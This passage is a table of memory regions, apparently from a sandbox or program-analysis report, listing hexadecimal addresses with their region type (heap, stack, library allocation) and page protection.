|
trusted library allocation
|
page read and write
|
||
|
77C4000
|
unkown
|
page read and write
|
||
|
855A000
|
unkown
|
page read and write
|
||
|
2ED5F051000
|
heap
|
page read and write
|
||
|
BECA000
|
unkown
|
page read and write
|
||
|
11891AF8000
|
heap
|
page read and write
|
||
|
C084000
|
heap
|
page read and write
|
||
|
1029F000
|
heap
|
page read and write
|
||
|
B3E0000
|
unkown
|
page read and write
|
||
|
49F19D000
|
stack
|
page read and write
|
||
|
6D3000
|
trusted library allocation
|
page read and write
|
||
|
C532C7F000
|
stack
|
page read and write
|
||
|
2008285A000
|
heap
|
page read and write
|
||
|
BD9C000
|
unkown
|
page read and write
|
||
|
11891ABC000
|
heap
|
page read and write
|
||
|
BE6000
|
heap
|
page read and write
|
||
|
6C09000
|
unkown
|
page read and write
|
||
|
756A000
|
unkown
|
page read and write
|
||
|
C021000
|
unkown
|
page read and write
|
||
|
6CDC000
|
heap
|
page read and write
|
||
|
7FF581A42000
|
unkown
|
page readonly
|
||
|
870000
|
unkown
|
page readonly
|
||
|
BD28000
|
heap
|
page read and write
|
||
|
7FF5854FC000
|
unkown
|
page readonly
|
||
|
852C000
|
heap
|
page read and write
|
||
|
C05000
|
heap
|
page read and write
|
||
|
BFF9000
|
heap
|
page read and write
|
||
|
C05F000
|
heap
|
page read and write
|
||
|
2ED5D13D000
|
heap
|
page read and write
|
||
|
C07E000
|
unkown
|
page read and write
|
||
|
1CAFA670000
|
heap
|
page read and write
|
||
|
11891AE6000
|
heap
|
page read and write
|
||
|
101C1000
|
heap
|
page read and write
|
||
|
82D0000
|
unkown
|
page read and write
|
||
|
C174000
|
heap
|
page read and write
|
||
|
103DA000
|
heap
|
page read and write
|
||
|
BFB000
|
heap
|
page read and write
|
||
|
C12A000
|
heap
|
page read and write
|
||
|
C25000
|
heap
|
page read and write
|
||
|
826C000
|
unkown
|
page read and write
|
||
|
103D4000
|
heap
|
page read and write
|
||
|
A9EA000
|
stack
|
page read and write
|
||
|
257DB9C5000
|
heap
|
page read and write
|
||
|
BF8A000
|
heap
|
page read and write
|
||
|
A8DE000
|
stack
|
page read and write
|
||
|
7FF5853BF000
|
unkown
|
page readonly
|
||
|
28D0000
|
unkown
|
page read and write
|
||
|
9758000
|
unkown
|
page read and write
|
||
|
2ED5F2AF000
|
heap
|
page read and write
|
||
|
20082831000
|
heap
|
page read and write
|
||
|
742401B5B000
|
unkown
|
page read and write
|
||
|
A1F1000
|
heap
|
page read and write
|
||
|
742403BCC000
|
trusted library allocation
|
page read and write
|
||
|
BEB2000
|
heap
|
page read and write
|
||
|
8434000
|
heap
|
page read and write
|
||
|
C2E000
|
heap
|
page read and write
|
||
|
C00C000
|
heap
|
page read and write
|
||
|
BF8000
|
heap
|
page read and write
|
||
|
2A85000
|
heap
|
page read and write
|
||
|
11891B3B000
|
heap
|
page read and write
|
||
|
BE8B000
|
heap
|
page read and write
|
||
|
2428A5B6000
|
heap
|
page read and write
|
||
|
6CF8000
|
unkown
|
page read and write
|
||
|
7448000
|
unkown
|
page read and write
|
||
|
7060000
|
unkown
|
page readonly
|
||
|
4020000
|
unkown
|
page read and write
|
||
|
84BB000
|
unkown
|
page read and write
|
||
|
8487000
|
unkown
|
page read and write
|
||
|
6D7E000
|
heap
|
page read and write
|
||
|
788F000
|
unkown
|
page read and write
|
||
|
742403744000
|
unkown
|
page read and write
|
||
|
A8E0000
|
unkown
|
page readonly
|
||
|
8170000
|
unkown
|
page read and write
|
||
|
103C4000
|
heap
|
page read and write
|
||
|
10276000
|
heap
|
page read and write
|
||
|
103F8000
|
heap
|
page read and write
|
||
|
6C4A000
|
unkown
|
page read and write
|
||
|
BD8E000
|
unkown
|
page read and write
|
||
|
1D085156000
|
heap
|
page read and write
|
||
|
8547000
|
unkown
|
page read and write
|
||
|
9F8F000
|
heap
|
page read and write
|
||
|
8362000
|
unkown
|
page read and write
|
||
|
3F9F000
|
unkown
|
page read and write
|
||
|
9F84000
|
heap
|
page read and write
|
||
|
C0A3000
|
heap
|
page read and write
|
||
|
742402CE7000
|
unkown
|
page read and write
|
||
|
BF03000
|
unkown
|
page read and write
|
||
|
10243000
|
heap
|
page read and write
|
||
|
2ED5F301000
|
heap
|
page read and write
|
||
|
BD19000
|
unkown
|
page read and write
|
||
|
20082780000
|
heap
|
page read and write
|
||
|
C05000
|
heap
|
page read and write
|
||
|
C08B000
|
heap
|
page read and write
|
||
|
6CD9000
|
heap
|
page read and write
|
||
|
7C00000
|
unkown
|
page readonly
|
||
|
AE2A000
|
stack
|
page read and write
|
||
|
BA32000
|
unkown
|
page read and write
|
||
|
10297000
|
heap
|
page read and write
|
||
|
C06F000
|
heap
|
page read and write
|
||
|
7FF585256000
|
unkown
|
page readonly
|
||
|
2133000
|
heap
|
page read and write
|
||
|
7FF585449000
|
unkown
|
page readonly
|
||
|
C01A000
|
unkown
|
page read and write
|
||
|
BCEB000
|
unkown
|
page read and write
|
||
|
BFDF000
|
unkown
|
page read and write
|
||
|
C32000
|
heap
|
page read and write
|
||
|
7424017B3000
|
unkown
|
page read and write
|
||
|
C2B000
|
heap
|
page read and write
|
||
|
8531000
|
heap
|
page read and write
|
||
|
8519000
|
heap
|
page read and write
|
||
|
6D50000
|
unkown
|
page read and write
|
||
|
8513000
|
unkown
|
page read and write
|
||
|
1037B000
|
heap
|
page read and write
|
||
|
BB4000
|
heap
|
page read and write
|
||
|
8335000
|
unkown
|
page read and write
|
||
|
1090A000
|
heap
|
page read and write
|
||
|
8191000
|
unkown
|
page read and write
|
||
|
103EE000
|
heap
|
page read and write
|
||
|
742402173000
|
unkown
|
page read and write
|
||
|
3752000
|
heap
|
page read and write
|
||
|
102F2000
|
heap
|
page read and write
|
||
|
10425000
|
heap
|
page read and write
|
||
|
2989000
|
stack
|
page read and write
|
||
|
BFC2000
|
heap
|
page read and write
|
||
|
3F4E000
|
unkown
|
page read and write
|
||
|
103BD000
|
heap
|
page read and write
|
||
|
2AA6000
|
unkown
|
page read and write
|
||
|
BE85000
|
heap
|
page read and write
|
||
|
7FF5852D9000
|
unkown
|
page readonly
|
||
|
2ED5D18C000
|
heap
|
page read and write
|
||
|
2ED5F28F000
|
heap
|
page read and write
|
||
|
2ED610CB000
|
heap
|
page read and write
|
||
|
78B9000
|
unkown
|
page read and write
|
||
|
84A8000
|
heap
|
page read and write
|
||
|
BAF9000
|
unkown
|
page read and write
|
||
|
BD1A000
|
heap
|
page read and write
|
||
|
8449000
|
heap
|
page read and write
|
||
|
FEDB000
|
unkown
|
page read and write
|
||
|
7DF4A2D61000
|
trusted library allocation
|
page execute read
|
||
|
2ED5F306000
|
heap
|
page read and write
|
||
|
A19E000
|
heap
|
page read and write
|
||
|
7FF585474000
|
unkown
|
page readonly
|
||
|
FFBC000
|
unkown
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
6D44000
|
unkown
|
page read and write
|
||
|
98E3000
|
unkown
|
page read and write
|
||
|
848B000
|
heap
|
page read and write
|
||
|
A255000
|
heap
|
page read and write
|
||
|
83AA000
|
unkown
|
page read and write
|
||
|
103E4000
|
heap
|
page read and write
|
||
|
BFDB000
|
heap
|
page read and write
|
||
|
718F000
|
unkown
|
page read and write
|
||
|
2ED5F27E000
|
heap
|
page read and write
|
||
|
BD72000
|
unkown
|
page read and write
|
||
|
BB66000
|
unkown
|
page read and write
|
||
|
7FF5A4D30000
|
unkown
|
page readonly
|
||
|
C06D000
|
unkown
|
page read and write
|
||
|
A1EF000
|
heap
|
page read and write
|
||
|
257DB9DE000
|
heap
|
page read and write
|
||
|
6CA5000
|
heap
|
page read and write
|
||
|
C029000
|
heap
|
page read and write
|
||
|
2ED5D1D4000
|
heap
|
page read and write
|
||
|
C0A000
|
heap
|
page read and write
|
||
|
26FA000
|
stack
|
page read and write
|
||
|
8511000
|
unkown
|
page read and write
|
||
|
C0B000
|
heap
|
page read and write
|
||
|
8427000
|
heap
|
page read and write
|
||
|
944F000
|
stack
|
page read and write
|
||
|
8296000
|
unkown
|
page read and write
|
||
|
200827D4000
|
heap
|
page read and write
|
||
|
102DE000
|
heap
|
page read and write
|
||
|
7FF5A4F70000
|
unkown
|
page readonly
|
||
|
2573000
|
trusted library allocation
|
page read and write
|
||
|
8215000
|
unkown
|
page read and write
|
||
|
8484000
|
unkown
|
page read and write
|
||
|
1D08513F000
|
heap
|
page read and write
|
||
|
102DE000
|
heap
|
page read and write
|
||
|
7FF58541B000
|
unkown
|
page readonly
|
||
|
10937000
|
heap
|
page read and write
|
||
|
102A8000
|
heap
|
page read and write
|
||
|
9F33000
|
unkown
|
page read and write
|
||
|
C18D000
|
heap
|
page read and write
|